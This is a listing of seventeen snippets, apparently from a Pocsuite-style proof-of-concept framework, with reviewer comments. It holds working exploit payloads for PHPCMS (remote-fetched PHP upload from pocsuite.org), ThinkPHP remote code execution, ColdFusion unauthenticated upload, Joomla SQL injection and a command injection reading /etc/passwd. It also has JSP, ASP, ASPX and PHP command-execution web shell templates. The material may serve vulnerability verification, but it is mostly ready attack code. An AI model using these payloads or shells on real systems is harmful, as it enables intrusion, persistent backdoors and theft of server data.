Пример #1
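 def _verify(self):
     """Verify mode: register a member whose ``info[content]`` carries a
     remote ``<img src>`` and see whether the server stores it as ``.php``.

     The registration form is posted with an image URL ending in
     ``?.php#.jpg``; the response is searched for the stored path
     (``<prefix>/YYYY/MMDD/<n>.php``) and, when found, that file is
     requested so ``VerifyInfo['webshell']`` only reports a URL that is
     actually served (HTTP 200).

     Returns ``self.parse_attack(result)``; ``result`` is empty when the
     response did not contain a stored ``.php`` path.

     NOTE(review): the ``"******"`` / ``"*****@*****.**"`` literals below
     contain no ``%s`` placeholder, so ``% (username)`` raises TypeError;
     they appear to be masked in this listing — restore the original
     format strings before running.

     Side effect: a successful run leaves a PHP file on the target that
     this check does not remove.
     """
     result = {}
     # rstrip avoids '//index.php' when self.url ends with a slash.
     url = self.url.rstrip('/') + "/index.php?m=member&c=index&a=register&siteid=1"
     username = randomStr(6)
     password = randomStr(6, '1234567890')
     data = {
         "siteid": "1",
         "modelid": "1",
         "username": "******" % (username),
         "password": "******" % (password),
         "email": "*****@*****.**" % (username),
         "info[content]":
         "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
         "dosubmit": "1",
         "protocol": "",
     }
     # Groups: (1) everything before the date directory, (2) the
     # '/YYYY/MMDD/' directory, (3) the numeric file name. Joined, they
     # form the stored path minus its '.php' suffix.
     match = r"img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
     resp = req.post(url, data=data)
     shell = re.findall(match, resp.text)
     if shell:
         # Built only after a match exists: the original indexed shell[0]
         # unconditionally and raised IndexError on every non-vulnerable
         # target.
         shellinfo = ''.join(shell[0]) + ".php"
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
         shell_resp = req.get(shellinfo)
         if shell_resp.status_code == 200:
             result['VerifyInfo']['webshell'] = shellinfo
     return self.parse_attack(result)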
Пример #2
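    def _verify(self):
        """Verify mode for the ThinkPHP 5 ``invokefunction`` / template
        ``file/write`` remote code execution.

        Each payload asks the target to write ``<random>.php`` containing
        ``<?php echo '<marker>';?>``; the file is then fetched and the
        check succeeds when the marker comes back.

        Returns ``self.parse_output(result)`` with ``result['VerifyInfo']``
        set to ``"success"`` only when a payload echoed the marker.

        Side effect: on a vulnerable target ``<random>.php`` is left in the
        web root — nothing here deletes it.
        """
        def vul_check(payload):
            # Trigger the write, then read the file back. The substring test
            # is done on .text: ``marker in response`` (as originally written)
            # iterates the Response in content chunks and compares whole
            # chunks, which is not a substring search.
            req.get(urlparse.urljoin(base_url, payload))
            return req.get(verify_url).text

        result = {}
        parts = urlparse.urlparse(self.url)
        if parts.port is None:
            # Make the port explicit in the netloc (the original appended
            # ':80' to the whole URL, which breaks when self.url has a path,
            # and used 80 even for https).
            default_port = 443 if parts.scheme == 'https' else 80
            parts = parts._replace(netloc='%s:%d' % (parts.netloc, default_port))
        base_url = parts.geturl()
        verify_str = randomStr(6)
        verify_filename = randomStr(3)
        verify_url = urlparse.urljoin(base_url, verify_filename + ".php")
        # Raw strings: the backslashes are part of the ThinkPHP class path
        # and must reach the server literally.
        payload_list = [
            r"index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=<?php echo '{}';?>"
            .format(verify_filename, verify_str),
            r"index.php?s=index/\think\template\driver\file/write?cacheFile={}.php&content=<?php echo '{}';?>"
            .format(verify_filename, verify_str)
        ]
        if any(verify_str in vul_check(x) for x in payload_list):
            result['VerifyInfo'] = "success"
        return self.parse_output(result)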
Пример #3
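class JspShell(Webshell):
    """JSP command-execution web shell template.

    ``_content`` is a ``str.format`` template (doubled braces, ``{0}`` is
    the password parameter name) that the framework fills in before
    uploading. Requesting the page with ``check=1`` makes it print the
    ``202c<keyword>4b70`` marker so the uploader can confirm the shell
    runs; requesting it with the password parameter present runs the
    ``cmd`` parameter through ``Runtime.exec`` and streams stdout back.

    NOTE(review): the gate tests the ``{0}`` (password) parameter but the
    command is read from ``cmd`` — the caller presumably sends both;
    confirm against the code that drives this shell. ``Runtime.exec(String)``
    splits on whitespace and does not go through a shell, so pipes and
    redirections in ``cmd`` are not interpreted.
    """
    _keyword = randomStr(20)
    # Java ``==`` on Strings compares references, so the original
    # ``request.getParameter("check") == "1"`` was effectively never true
    # for a request parameter; ``"1".equals(...)`` is the value comparison
    # and is null-safe with the literal on the left.
    _content = '<%@ page import="java.util.*,java.io.*" %>\n' \
        '<%@ page import="java.io.*"%>\n' \
        '<%@ page import="java.util.*"%>\n' \
        '<%\n' \
        'if ("1".equals(request.getParameter("check")))\n' \
        '    out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));\n' \
        'if (request.getParameter("{0}") != null)\n' \
        '{{\n' \
        '    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\n' \
        '    OutputStream os = p.getOutputStream();\n' \
        '    InputStream in = p.getInputStream();\n' \
        '    DataInputStream dis = new DataInputStream(in);\n' \
        '    String disr = dis.readLine();\n' \
        '    while ( disr != null)\n' \
        '    {{\n' \
        '        out.println(disr);\n' \
        '        disr = dis.readLine();\n' \
        '    }}\n' \
        '\n}}' \
        '%>\n'
    # Appears masked in this listing.
    _password = '******'
    # Query parameters that make the shell emit the marker.
    _check_data = {'check': '1'}
    # From here on _keyword is the full marker the check response must contain.
    _keyword = '202c%s4b70' % _keyword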
Пример #4
class AspShell(Webshell):
    """Classic ASP ``eval`` web shell template.

    ``_content`` is a ``str.format`` template whose ``{0}`` is the
    request parameter that carries the code to evaluate.
    ``_check_statement`` is the ASP statement the framework sends through
    that parameter to make the shell echo the ``202c<keyword>4b70`` marker.
    """
    _keyword = randomStr(20)
    # Appears masked in this listing.
    _password = '******'
    _content = '<%eval request("{0}")%>'
    _check_statement = (
        'Response.Write(Replace("202cTEST4b70","TEST","{0}"))'.format(_keyword)
    )
    # From here on _keyword is the full marker expected in the response.
    _keyword = '202c{0}4b70'.format(_keyword)
Пример #5
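    def _verify(self):
        """Verify mode for a command-injection check driven by ``self.run_cmd``.

        ``self.url`` is normalised to ``scheme://host[:port]`` (any path is
        dropped; ``self.raw_url`` keeps the original). A random marker is
        echoed through ``run_cmd`` and, when it comes back on the first
        line, ``/etc/passwd`` and ``/etc/hosts`` are read as evidence.

        ``${IFS}`` stands in for spaces and ``%2f`` for ``/`` so the
        injected command survives whatever the transport rejects.

        Returns ``self.parse_output(result)``; ``result`` is empty unless
        the marker was echoed.
        """
        result = {}
        self.raw_url = self.url
        parsed = urlparse.urlparse(self.url)
        host, port, scheme = parsed.hostname, parsed.port, parsed.scheme
        if port is None:
            # No explicit port: https relies on its implicit default, http
            # gets ':80' appended as before.
            if scheme == "https":
                self.url = "%s://%s" % (scheme, host)
            else:
                self.url = "%s://%s:80" % (scheme, host)
        else:
            # Keep an explicit port for either scheme; the original dropped a
            # non-default https port (https://host:8443 became https://host).
            self.url = "%s://%s:%s" % (scheme, host, port)

        flag = randomStr(10)
        try:
            check = self.run_cmd("echo${IFS}" + flag).split("\n")[0]
            if check == flag:
                info = result.setdefault("VerifyInfo", {})
                info["url"] = self.url
                info["passwd"] = self.run_cmd("cat${IFS}%2fetc%2fpasswd")
                info["hosts"] = self.run_cmd("cat${IFS}%2fetc%2fhosts")
        except Exception:
            # Best-effort probe: a transport or parsing error must not abort
            # the scan, so whatever was collected before the failure is
            # reported as-is. (The original swallowed this silently too.)
            pass
        return self.parse_output(result)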
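    def _verify(self):
        """Verify mode for the ThinkPHP 5 file-write RCE, delivered over a
        raw HTTP/1.0 socket followed by 36 000 bytes of padding.

        Each payload asks the target to write ``<random>.php`` containing
        ``<?php echo '<marker>';?>``; the file is then fetched with ``req``
        and the check succeeds when the marker comes back.

        Returns ``self.parse_output(result)`` with ``result['VerifyInfo']``
        set to ``"success"`` only when a payload echoed the marker.

        Side effect: on a vulnerable target ``<random>.php`` is left in the
        web root. The raw-socket path is plain TCP, so an https target is
        not reachable this way — TODO confirm whether that is intended.
        """
        def vul_check(payload):
            # The original connected to a hard-coded 127.0.0.1:8080 and sent
            # 'Host: 127.0.0.1' regardless of self.url; the target now comes
            # from the URL under test. sendall() rather than send() so the
            # whole buffer goes out, and the socket is closed even on error.
            sock = socket.socket()
            try:
                sock.connect((target_host, target_port))
                sock.sendall('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
                sock.sendall('Host: {}\r\n'.format(target_host).encode('ascii'))
                sock.sendall('\r\n'.encode('ascii'))
                # Same padding as before: 18 writes of 2000 bytes.
                padding = ('testssdfsf' * 200).encode('ascii')
                for _ in range(18):
                    sock.sendall(padding)
            finally:
                sock.close()
            # .text so the marker test is a real substring search (``in`` on
            # a Response iterates content chunks and compares whole chunks).
            return req.get(verify_url).text

        result = {}
        parts = urlparse.urlparse(self.url)
        if parts.port is None:
            # Make the port explicit in the netloc (appending ':80' to the
            # whole URL, as the original did, breaks when self.url has a path).
            parts = parts._replace(netloc='%s:80' % parts.netloc)
        base_url = parts.geturl()
        target_host = parts.hostname
        target_port = parts.port
        verify_str = randomStr(6)
        verify_filename = randomStr(3)
        verify_url = urlparse.urljoin(base_url, verify_filename + ".php")
        payload_list = [
            "index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]={}.php&vars[1][]=%3C?php%20echo%20'{}';?%3E"
            .format(verify_filename, verify_str),
            # Raw string: the backslashes are part of the ThinkPHP class path.
            # The original had '%3Cphp' (missing '?'), so the written file
            # was not a valid PHP open tag.
            r"index.php?s=index/\think\template\driver\file/write?cacheFile={}.php&content=%3C?php%20echo%20'{}';?%3E"
            .format(verify_filename, verify_str)
        ]
        if any(verify_str in vul_check(x) for x in payload_list):
            result['VerifyInfo'] = "success"
        return self.parse_output(result)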
Пример #7
class AspxVerify(VerifyShell):
    """Self-deleting ASPX probe.

    The page writes the ``202c<keyword>4b70`` marker and then deletes its
    own file (``Request.PhysicalPath``), so a single request both proves
    execution and cleans up.
    """
    _keyword = randomStr(20)
    _content = '\n'.join([
        '<%@ Page Language="Jscript" ContentType="text/html" '
        'validateRequest="false" aspcompat="true"%>',
        '<%Response.Write("202cTEST4b70".Replace("TEST","{0}"))%>'.format(_keyword),
        '<%System.IO.File.Delete(Request.PhysicalPath);%>',
    ])
    # From here on _keyword is the full marker expected in the response.
    _keyword = '202c{0}4b70'.format(_keyword)
Пример #8
class AspxShell(Webshell):
    """ASPX (JScript.NET) ``eval`` web shell template.

    ``_content`` is a ``str.format`` template whose ``{0}`` is the request
    item that carries the code to evaluate. ``_check_statement`` is the
    statement sent through it to echo the ``202c<keyword>4b70`` marker.
    """
    _keyword = randomStr(20)
    # Appears masked in this listing.
    _password = '******'
    _content = (
        '<%@ Page Language="Jscript"%>'
        '<%eval(Request.Item["{0}"],"unsafe");%>'
    )
    _check_statement = (
        'Response.Write("202cTEST4b70".Replace("TEST","{0}"))'.format(_keyword)
    )
    # From here on _keyword is the full marker expected in the response.
    _keyword = '202c{0}4b70'.format(_keyword)
Пример #9
class AspVerify(VerifyShell):
    """Self-deleting classic ASP probe.

    Writes the ``202c<keyword>4b70`` marker, then removes its own file via
    ``Scripting.FileSystemObject`` using the ``Path_Translated`` server
    variable.
    """
    _keyword = randomStr(20)
    _content = '\n'.join([
        '<%',
        'Response.Write(Replace("202cTEST4b70","TEST","{0}"))'.format(_keyword),
        'CreateObject("Scripting.FileSystemObject").'
        'DeleteFile(Request.ServerVariables("Path_Translated"))',
        '%>',
    ])
    # From here on _keyword is the full marker expected in the response.
    _keyword = '202c{0}4b70'.format(_keyword)
Пример #10
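    def _verify(self):
        """Verify mode: unauthenticated upload through the CKEditor file
        manager (``upload.cfm``) shipped with ColdFusion.

        A multipart body with a random file name and random content is
        posted; the file is then requested from ``uploadedFiles/`` and the
        check succeeds when the random content is served back.

        Side effect: ``self.url`` gains ``:8500`` (ColdFusion's default
        port) when no port was given, and the uploaded file is left on the
        target.

        Returns ``self.parse_output(result)``; ``result`` is empty unless
        the uploaded content was served.
        """
        result = {}
        parts = urlparse(self.url)
        if parts.port is None:
            # Put the port into the netloc; appending ':8500' to the whole
            # URL (as before) breaks when self.url carries a path.
            self.url = parts._replace(netloc=parts.netloc + ":8500").geturl()
        url = urljoin(
            self.url,
            '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
        filename = randomStr(6)
        content = randomStr(12)

        # The listing had a literal "(unknown)" where the file name belongs,
        # so the random name was never sent and the GET below could not
        # match; {filename} makes the upload name and the checked path agree.
        delimiter = "-----------------------------24464570528145"
        data = delimiter + "\r\n"
        data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format(
            filename=filename)
        data += "Content-Type: image/jpeg\r\n"
        data += "\r\n"
        data += "{content}\r\n".format(content=content)
        data += delimiter + "\r\n"
        data += "Content-Disposition: form-data; name=\"path\"\r\n"
        data += "\r\n"
        data += "we\r\n"
        data += delimiter + "--\r\n"

        header = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Content-Type":
            "multipart/form-data; boundary=---------------------------24464570528145"
        }
        req.post(url, headers=header, data=data)

        file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
        file_url = urljoin(self.url, file_path)
        response = req.get(file_url)
        # .text keeps this a str/str comparison on both Python 2 and 3.
        if content in response.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Shell'] = file_url

        return self.parse_output(result)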
Пример #11
class JspVerify(VerifyShell):
    """Self-deleting JSP probe.

    Prints its own path, deletes its file, then writes the
    ``202c<keyword>4b70`` marker. The doubled braces suggest the base class
    runs ``str.format`` over ``_content`` before upload — TODO confirm.
    """
    _keyword = randomStr(20)
    _content = '\n'.join([
        '<%@ page import="java.util.*,java.io.*" %>',
        '<%@ page import="java.io.*"%>',
        '<%@ page import="java.util.*"%>',
        '<%',
        'String path=request.getRealPath("")+request.getServletPath();',
        # Echoes the server-side path of the probe into the response.
        'out.println(path);',
        'File d=new File(path);',
        'if(d.exists()){{',
        '  d.delete();',
        '  }}',
        '%>',
        '<% out.println("202cTEST4b70".replace("TEST","' + _keyword + '"));%>',
    ])
    # From here on _keyword is the full marker expected in the response.
    _keyword = '202c{0}4b70'.format(_keyword)
Пример #12
 def _verify(self):
     """Verify mode: error-based SQL injection in the Joomla
     ``com_users`` notes view (``filter[category_id]``).

     After ``self.get_pass`` authenticates the session, an ``updatexml``
     payload embeds ``md5(<random digits>)`` in the XPath error. The
     check passes when the server answers 500 and the response carries
     the leading 31 hex characters of that digest (the error text is
     truncated, hence not the full 32).

     Returns ``self.parse_output(result)``; ``result`` is empty on a miss.
     """
     result = {}
     session = req.session()
     self.get_pass(session)
     marker = randomStr(10, "0123456789")
     target = urljoin(self.url,
                      '/administrator/index.php?option=com_users&view=notes')
     payload = (
         'filter[search]=&list[fullordering]=a.review_time DESC'
         '&list[limit]=20&filter[published]=1'
         '&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'
     ).format(randstr=marker)
     response = session.post(url=target, headers=self.headers, data=payload)
     expected = hashlib.md5(marker).hexdigest()[0:31]
     if response.status_code == 500 and expected in response.content:
         result['VerifyInfo'] = {'URL': target}
     return self.parse_output(result)
Пример #13
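    def _verify(self):
        """Verify mode for the ThinkPHP ``_method=__construct`` filter RCE.

        Posts to ``index.php?s=captcha`` with ``filter[]=system`` and the
        command in ``server[REQUEST_METHOD]``; on a vulnerable install the
        token echoed by ``echo <token>`` appears alongside ThinkPHP's
        "system error" page text. Both strings must be present to count.

        Side effect: ``self.url`` is rewritten to the captcha endpoint and
        is what ``VerifyInfo['URL']`` reports.

        Returns ``self.parse_output(result)``; ``result`` is empty on a miss.
        """
        result = {}
        # rstrip keeps a trailing '/' in the configured URL from producing
        # '//index.php'.
        self.url = self.url.rstrip('/') + '/index.php?s=captcha'
        token = randomStr()
        exploitdata = {
            '_method': '__construct',
            'filter[]': 'system',
            'method': 'get',
            'server[REQUEST_METHOD]': "echo {}".format(token),
        }
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        matchstring = 'system error'

        resp = req.post(self.url, data=exploitdata, headers=headers)

        # .text so both substring checks are str/str on Python 2 and 3.
        body = resp.text
        if matchstring in body.lower() and token in body:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)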
Пример #14
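class PhpVerify(VerifyShell):
    """Self-deleting PHP probe: dumps ``md5(<keyword>)`` and unlinks itself."""
    _keyword = randomStr(20)
    # The keyword is quoted: the original emitted md5(<bareword>), which PHP
    # only tolerates as an undefined-constant notice (< 8) and rejects in
    # PHP 8 (and is a parse error if the keyword starts with a digit).
    _content = "<?php var_dump(md5('" + _keyword + "'));unlink(__FILE__);?>"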
Пример #15
class PhpVerify(VerifyShell):
    """Self-deleting PHP probe: dumps the ``202c<keyword>4b70`` marker and unlinks itself."""
    _keyword = randomStr(20)
    _content = '<?php var_dump("202c%s4b70");unlink(__FILE__);?>' % _keyword
Пример #16
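class PhpShell(Webshell):
    """PHP ``assert`` web shell template.

    ``_content`` is a ``str.format`` template whose ``{0}`` is the request
    parameter evaluated by ``assert``; ``_check_statement`` is sent through
    it so the shell prints ``md5(<keyword>)``.

    NOTE(review): ``assert()`` with a string argument is deprecated since
    PHP 7.2 and no longer evaluates code in PHP 8, so this shell only works
    on older runtimes.
    """
    _keyword = randomStr(20)
    # Appears masked in this listing.
    _password = '******'
    _content = "<?php @assert($_REQUEST['{0}']);?>"
    # The keyword is quoted: the original sent md5(<bareword>), which PHP
    # only tolerates as an undefined-constant notice (< 8) and rejects in
    # PHP 8.
    _check_statement = "var_dump(md5('" + _keyword + "'));"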
Пример #17
class PhpShell(Webshell):
    """PHP ``assert`` web shell that also dumps the ``202c<keyword>4b70`` marker.

    ``_content`` is filled in here (password parameter name and keyword)
    rather than left as a template. NOTE(review): string ``assert()`` is
    deprecated since PHP 7.2 and does not evaluate code in PHP 8.
    """
    _keyword = randomStr(20)
    # Appears masked in this listing.
    _password = '******'
    _content = "<?php @assert($_REQUEST['%s']);var_dump('202c%s4b70')?>" % (_password, _keyword)